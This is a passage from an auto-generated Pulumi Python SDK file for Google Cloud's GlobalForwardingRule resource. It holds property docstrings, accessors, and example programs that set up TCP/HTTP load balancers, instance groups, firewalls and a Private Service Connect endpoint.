metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
self_link: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering GlobalForwardingRule resources.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
:param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
:param pulumi.Input[str] label_fingerprint: Used internally during label updates.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
:param pulumi.Input[str] load_balancing_scheme: This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
:param pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]] metadata_filters: Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
:param pulumi.Input[str] name: Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
:param pulumi.Input[str] network: This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
:param pulumi.Input[str] port_range: This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] self_link: The URI of the created resource.
:param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ip_version is not None:
pulumi.set(__self__, "ip_version", ip_version)
if label_fingerprint is not None:
pulumi.set(__self__, "label_fingerprint", label_fingerprint)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if load_balancing_scheme is not None:
pulumi.set(__self__, "load_balancing_scheme", load_balancing_scheme)
if metadata_filters is not None:
pulumi.set(__self__, "metadata_filters", metadata_filters)
if name is not None:
pulumi.set(__self__, "name", name)
if network is not None:
pulumi.set(__self__, "network", network)
if port_range is not None:
pulumi.set(__self__, "port_range", port_range)
if project is not None:
pulumi.set(__self__, "project", project)
if self_link is not None:
pulumi.set(__self__, "self_link", self_link)
if target is not None:
pulumi.set(__self__, "target", target)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description of this resource. Provide this property when
you create the resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter(name="ipVersion")
def ip_version(self) -> Optional[pulumi.Input[str]]:
"""
The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
"""
return pulumi.get(self, "ip_version")
@ip_version.setter
def ip_version(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_version", value)
@property
@pulumi.getter(name="labelFingerprint")
def label_fingerprint(self) -> Optional[pulumi.Input[str]]:
"""
Used internally during label updates.
"""
return pulumi.get(self, "label_fingerprint")
@label_fingerprint.setter
def label_fingerprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "label_fingerprint", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Labels to apply to this forwarding rule. A list of key->value pairs.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="loadBalancingScheme")
def load_balancing_scheme(self) -> Optional[pulumi.Input[str]]:
"""
This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
"""
return pulumi.get(self, "load_balancing_scheme")
@load_balancing_scheme.setter
def load_balancing_scheme(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "load_balancing_scheme", value)
@property
@pulumi.getter(name="metadataFilters")
def metadata_filters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]:
"""
Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
"""
return pulumi.get(self, "metadata_filters")
@metadata_filters.setter
def metadata_filters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['GlobalForwardingRuleMetadataFilterArgs']]]]):
pulumi.set(self, "metadata_filters", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def network(self) -> Optional[pulumi.Input[str]]:
"""
This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
"""
return pulumi.get(self, "network")
@network.setter
def network(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "network", value)
@property
@pulumi.getter(name="portRange")
def port_range(self) -> Optional[pulumi.Input[str]]:
"""
This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
"""
return pulumi.get(self, "port_range")
@port_range.setter
def port_range(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "port_range", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="selfLink")
def self_link(self) -> Optional[pulumi.Input[str]]:
"""
The URI of the created resource.
"""
return pulumi.get(self, "self_link")
@self_link.setter
def self_link(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "self_link", value)
@property
@pulumi.getter
def target(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
return pulumi.get(self, "target")
@target.setter
def target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "target", value)
class GlobalForwardingRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
ip_protocol: Optional[pulumi.Input[str]] = None,
ip_version: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
load_balancing_scheme: Optional[pulumi.Input[str]] = None,
metadata_filters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]]] = None,
name: Optional[pulumi.Input[str]] = None,
network: Optional[pulumi.Input[str]] = None,
port_range: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
target: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Represents a GlobalForwardingRule resource. Global forwarding rules are
used to forward traffic to the correct load balancer for HTTP load
balancing. Global forwarding rules can only be used for HTTP load
balancing.
For more information, see
https://cloud.google.com/compute/docs/load-balancing/http/
## Example Usage
### External Tcp Proxy Lb Mig Backend Custom Header
```python
import pulumi
import pulumi_gcp as gcp
# External TCP proxy load balancer with managed instance group backend
# VPC
default_network = gcp.compute.Network("defaultNetwork", auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend subnet
default_subnetwork = gcp.compute.Subnetwork("defaultSubnetwork",
ip_cidr_range="10.0.1.0/24",
region="us-central1",
network=default_network.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# reserved IP address
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress", opts=pulumi.ResourceOptions(provider=google_beta))
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck",
timeout_sec=1,
check_interval_sec=1,
tcp_health_check=gcp.compute.HealthCheckTcpHealthCheckArgs(
port=80,
),
opts=pulumi.ResourceOptions(provider=google_beta))
# instance template
default_instance_template = gcp.compute.InstanceTemplate("defaultInstanceTemplate",
machine_type="e2-small",
tags=["allow-health-check"],
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network=default_network.id,
subnetwork=default_subnetwork.id,
access_configs=[gcp.compute.InstanceTemplateNetworkInterfaceAccessConfigArgs()],
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image="debian-cloud/debian-10",
auto_delete=True,
boot=True,
)],
metadata={
"startup-script": \"\"\"#! /bin/bash
set -euo pipefail
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y nginx-light jq
NAME=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname")
IP=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip")
METADATA=$(curl -f -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=True" | jq 'del(.["startup-script"])')
cat <<EOF > /var/www/html/index.html
<pre>
Name: $NAME
IP: $IP
Metadata: $METADATA
</pre>
EOF
\"\"\",
},
opts=pulumi.ResourceOptions(provider=google_beta))
# MIG
default_instance_group_manager = gcp.compute.InstanceGroupManager("defaultInstanceGroupManager",
zone="us-central1-c",
named_ports=[gcp.compute.InstanceGroupManagerNamedPortArgs(
name="tcp",
port=110,
)],
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=default_instance_template.id,
name="primary",
)],
base_instance_name="vm",
target_size=2,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend service
default_backend_service = gcp.compute.BackendService("defaultBackendService",
protocol="TCP",
port_name="tcp",
load_balancing_scheme="EXTERNAL",
timeout_sec=10,
health_checks=[default_health_check.id],
backends=[gcp.compute.BackendServiceBackendArgs(
group=default_instance_group_manager.instance_group,
balancing_mode="UTILIZATION",
max_utilization=1,
capacity_scaler=1,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
default_target_tcp_proxy = gcp.compute.TargetTCPProxy("defaultTargetTCPProxy", backend_service=default_backend_service.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# forwarding rule
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
ip_protocol="TCP",
load_balancing_scheme="EXTERNAL",
port_range="110",
target=default_target_tcp_proxy.id,
ip_address=default_global_address.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# allow access from health check ranges
default_firewall = gcp.compute.Firewall("defaultFirewall",
direction="INGRESS",
network=default_network.id,
source_ranges=[
"130.211.0.0/22",
"35.191.0.0/16",
],
allows=[gcp.compute.FirewallAllowArgs(
protocol="tcp",
)],
target_tags=["allow-health-check"],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### External Http Lb Mig Backend Custom Header
```python
import pulumi
import pulumi_gcp as gcp
# External HTTP load balancer with a CDN-enabled managed instance group backend
# and custom request and response headers
# VPC
default_network = gcp.compute.Network("defaultNetwork", auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend subnet
default_subnetwork = gcp.compute.Subnetwork("defaultSubnetwork",
ip_cidr_range="10.0.1.0/24",
region="us-central1",
network=default_network.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# reserved IP address
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress", opts=pulumi.ResourceOptions(provider=google_beta))
# health check
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck", http_health_check=gcp.compute.HealthCheckHttpHealthCheckArgs(
port_specification="USE_SERVING_PORT",
),
opts=pulumi.ResourceOptions(provider=google_beta))
# instance template
default_instance_template = gcp.compute.InstanceTemplate("defaultInstanceTemplate",
machine_type="e2-small",
tags=["allow-health-check"],
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network=default_network.id,
subnetwork=default_subnetwork.id,
access_configs=[gcp.compute.InstanceTemplateNetworkInterfaceAccessConfigArgs()],
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image="debian-cloud/debian-10",
auto_delete=True,
boot=True,
)],
metadata={
"startup-script": \"\"\"#! /bin/bash
set -euo pipefail
export DEBIAN_FRONTEND=noninteractive
apt-get update
apt-get install -y nginx-light jq
NAME=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/hostname")
IP=$(curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/0/ip")
METADATA=$(curl -f -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=True" | jq 'del(.["startup-script"])')
cat <<EOF > /var/www/html/index.html
<pre>
Name: $NAME
IP: $IP
Metadata: $METADATA
</pre>
EOF
\"\"\",
},
opts=pulumi.ResourceOptions(provider=google_beta))
# MIG
default_instance_group_manager = gcp.compute.InstanceGroupManager("defaultInstanceGroupManager",
zone="us-central1-c",
named_ports=[gcp.compute.InstanceGroupManagerNamedPortArgs(
name="http",
port=8080,
)],
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=default_instance_template.id,
name="primary",
)],
base_instance_name="vm",
target_size=2,
opts=pulumi.ResourceOptions(provider=google_beta))
# backend service with custom request and response headers
default_backend_service = gcp.compute.BackendService("defaultBackendService",
protocol="HTTP",
port_name="my-port",
load_balancing_scheme="EXTERNAL",
timeout_sec=10,
enable_cdn=True,
custom_request_headers=["X-Client-Geo-Location: {client_region_subdivision}, {client_city}"],
custom_response_headers=["X-Cache-Hit: {cdn_cache_status}"],
health_checks=[default_health_check.id],
backends=[gcp.compute.BackendServiceBackendArgs(
group=default_instance_group_manager.instance_group,
balancing_mode="UTILIZATION",
capacity_scaler=1,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
# url map
default_url_map = gcp.compute.URLMap("defaultURLMap", default_service=default_backend_service.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# http proxy
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy", url_map=default_url_map.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# forwarding rule
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
ip_protocol="TCP",
load_balancing_scheme="EXTERNAL",
port_range="80",
target=default_target_http_proxy.id,
ip_address=default_global_address.id,
opts=pulumi.ResourceOptions(provider=google_beta))
# allow access from health check ranges
default_firewall = gcp.compute.Firewall("defaultFirewall",
direction="INGRESS",
network=default_network.id,
source_ranges=[
"130.211.0.0/22",
"35.191.0.0/16",
],
allows=[gcp.compute.FirewallAllowArgs(
protocol="tcp",
)],
target_tags=["allow-health-check"],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Global Forwarding Rule Http
```python
import pulumi
import pulumi_gcp as gcp
default_http_health_check = gcp.compute.HttpHealthCheck("defaultHttpHealthCheck",
request_path="/",
check_interval_sec=1,
timeout_sec=1)
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
health_checks=[default_http_health_check.id])
default_url_map = gcp.compute.URLMap("defaultURLMap",
description="a description",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)])
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy",
description="a description",
url_map=default_url_map.id)
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
target=default_target_http_proxy.id,
port_range="80")
```
### Global Forwarding Rule Internal
```python
import pulumi
import pulumi_gcp as gcp
debian_image = gcp.compute.get_image(family="debian-9",
project="debian-cloud")
instance_template = gcp.compute.InstanceTemplate("instanceTemplate",
machine_type="e2-medium",
network_interfaces=[gcp.compute.InstanceTemplateNetworkInterfaceArgs(
network="default",
)],
disks=[gcp.compute.InstanceTemplateDiskArgs(
source_image=debian_image.self_link,
auto_delete=True,
boot=True,
)],
opts=pulumi.ResourceOptions(provider=google_beta))
igm = gcp.compute.InstanceGroupManager("igm",
versions=[gcp.compute.InstanceGroupManagerVersionArgs(
instance_template=instance_template.id,
name="primary",
)],
base_instance_name="internal-glb",
zone="us-central1-f",
target_size=1,
opts=pulumi.ResourceOptions(provider=google_beta))
default_health_check = gcp.compute.HealthCheck("defaultHealthCheck",
check_interval_sec=1,
timeout_sec=1,
tcp_health_check=gcp.compute.HealthCheckTcpHealthCheckArgs(
port=80,
),
opts=pulumi.ResourceOptions(provider=google_beta))
default_backend_service = gcp.compute.BackendService("defaultBackendService",
port_name="http",
protocol="HTTP",
timeout_sec=10,
load_balancing_scheme="INTERNAL_SELF_MANAGED",
backends=[gcp.compute.BackendServiceBackendArgs(
group=igm.instance_group,
balancing_mode="RATE",
capacity_scaler=0.4,
max_rate_per_instance=50,
)],
health_checks=[default_health_check.id],
opts=pulumi.ResourceOptions(provider=google_beta))
default_url_map = gcp.compute.URLMap("defaultURLMap",
description="a description",
default_service=default_backend_service.id,
host_rules=[gcp.compute.URLMapHostRuleArgs(
hosts=["mysite.com"],
path_matcher="allpaths",
)],
path_matchers=[gcp.compute.URLMapPathMatcherArgs(
name="allpaths",
default_service=default_backend_service.id,
path_rules=[gcp.compute.URLMapPathMatcherPathRuleArgs(
paths=["/*"],
service=default_backend_service.id,
)],
)],
opts=pulumi.ResourceOptions(provider=google_beta))
default_target_http_proxy = gcp.compute.TargetHttpProxy("defaultTargetHttpProxy",
description="a description",
url_map=default_url_map.id,
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
target=default_target_http_proxy.id,
port_range="80",
load_balancing_scheme="INTERNAL_SELF_MANAGED",
ip_address="0.0.0.0",
metadata_filters=[gcp.compute.GlobalForwardingRuleMetadataFilterArgs(
filter_match_criteria="MATCH_ANY",
filter_labels=[gcp.compute.GlobalForwardingRuleMetadataFilterFilterLabelArgs(
name="PLANET",
value="MARS",
)],
)],
opts=pulumi.ResourceOptions(provider=google_beta))
```
### Private Service Connect Google Apis
```python
import pulumi
import pulumi_gcp as gcp
network = gcp.compute.Network("network",
project="my-project-name",
auto_create_subnetworks=False,
opts=pulumi.ResourceOptions(provider=google_beta))
vpc_subnetwork = gcp.compute.Subnetwork("vpcSubnetwork",
project=network.project,
ip_cidr_range="10.2.0.0/16",
region="us-central1",
network=network.id,
private_ip_google_access=True,
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_address = gcp.compute.GlobalAddress("defaultGlobalAddress",
project=network.project,
address_type="INTERNAL",
purpose="PRIVATE_SERVICE_CONNECT",
network=network.id,
address="100.100.100.106",
opts=pulumi.ResourceOptions(provider=google_beta))
default_global_forwarding_rule = gcp.compute.GlobalForwardingRule("defaultGlobalForwardingRule",
project=network.project,
target="all-apis",
network=network.id,
ip_address=default_global_address.id,
load_balancing_scheme="",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
GlobalForwardingRule can be imported using any of these accepted formats
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default projects/{{project}}/global/forwardingRules/{{name}}
```
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{project}}/{{name}}
```
```sh
$ pulumi import gcp:compute/globalForwardingRule:GlobalForwardingRule default {{name}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: An optional description of this resource. Provide this property when
you create the resource.
:param pulumi.Input[str] ip_address: The IP address that this forwarding rule serves. When a client sends
traffic to this IP address, the forwarding rule directs the traffic to
the target that you specify in the forwarding rule. The
loadBalancingScheme and the forwarding rule's target determine the
type of IP address that you can use. For detailed information, refer
to [IP address specifications](https://cloud.google.com/load-balancing/docs/forwarding-rule-concepts#ip_address_specifications).
An address can be specified either by a literal IP address or a
reference to an existing Address resource. If you don't specify a
reserved IP address, an ephemeral IP address is assigned.
The value must be set to 0.0.0.0 when the target is a targetGrpcProxy
that has validateForProxyless field set to true.
For Private Service Connect forwarding rules that forward traffic to
Google APIs, IP address must be provided.
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. When the load balancing scheme is
INTERNAL_SELF_MANAGED, only TCP is valid. This field must not be set if the
global address is configured as a purpose of PRIVATE_SERVICE_CONNECT
and addressType of INTERNAL
Possible values are `TCP`, `UDP`, `ESP`, `AH`, `SCTP`, and `ICMP`.
:param pulumi.Input[str] ip_version: The IP Version that will be used by this global forwarding rule.
Possible values are `IPV4` and `IPV6`.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Labels to apply to this forwarding rule. A list of key->value pairs.
:param pulumi.Input[str] load_balancing_scheme: This signifies what the GlobalForwardingRule will be used for.
The value of INTERNAL_SELF_MANAGED means that this will be used for
Internal Global HTTP(S) LB. The value of EXTERNAL means that this
will be used for External Global Load Balancing (HTTP(S) LB,
External TCP/UDP LB, SSL Proxy)
Note: This field must be set "" if the global address is
configured as a purpose of PRIVATE_SERVICE_CONNECT and addressType of INTERNAL.
Default value is `EXTERNAL`.
Possible values are `EXTERNAL` and `INTERNAL_SELF_MANAGED`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['GlobalForwardingRuleMetadataFilterArgs']]]] metadata_filters: Opaque filter criteria used by Loadbalancer to restrict routing
configuration to a limited set xDS compliant clients. In their xDS
requests to Loadbalancer, xDS clients present node metadata. If a
match takes place, the relevant routing configuration is made available
to those proxies.
For each metadataFilter in this list, if its filterMatchCriteria is set
to MATCH_ANY, at least one of the filterLabels must match the
corresponding label provided in the metadata. If its filterMatchCriteria
is set to MATCH_ALL, then all of its filterLabels must match with
corresponding labels in the provided metadata.
metadataFilters specified here can be overridden by those specified in
the UrlMap that this ForwardingRule references.
metadataFilters only applies to Loadbalancers that have their
loadBalancingScheme set to INTERNAL_SELF_MANAGED.
Structure is documented below.
:param pulumi.Input[str] name: Name of the metadata label. The length must be between
1 and 1024 characters, inclusive.
:param pulumi.Input[str] network: This field is not used for external load balancing.
For INTERNAL_SELF_MANAGED load balancing, this field
identifies the network that the load balanced IP should belong to
for this global forwarding rule. If this field is not specified,
the default network will be used.
:param pulumi.Input[str] port_range: This field is used along with the target field for TargetHttpProxy,
TargetHttpsProxy, TargetSslProxy, TargetTcpProxy, TargetVpnGateway,
TargetPool, TargetInstance.
Applicable only when IPProtocol is TCP, UDP, or SCTP, only packets
addressed to ports in the specified range will be forwarded to target.
Forwarding rules with the same [IPAddress, IPProtocol] pair must have
disjoint port ranges.
Some types of forwarding target have constraints on the acceptable
ports:
* TargetHttpProxy: 80, 8080
* TargetHttpsProxy: 443
* TargetTcpProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetSslProxy: 25, 43, 110, 143, 195, 443, 465, 587, 700, 993, 995,
1883, 5222
* TargetVpnGateway: 500, 4500
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
:param pulumi.Input[str] target: The URL of the target resource to receive the matched traffic.
The forwarded traffic must be of a type appropriate to the target object.
For INTERNAL_SELF_MANAGED load balancing, only HTTP and HTTPS targets
are valid.
For global address with a purpose of PRIVATE_SERVICE_CONNECT and
addressType of INTERNAL, only "all-apis" and "vpc-sc" are valid.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: GlobalForwardingRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
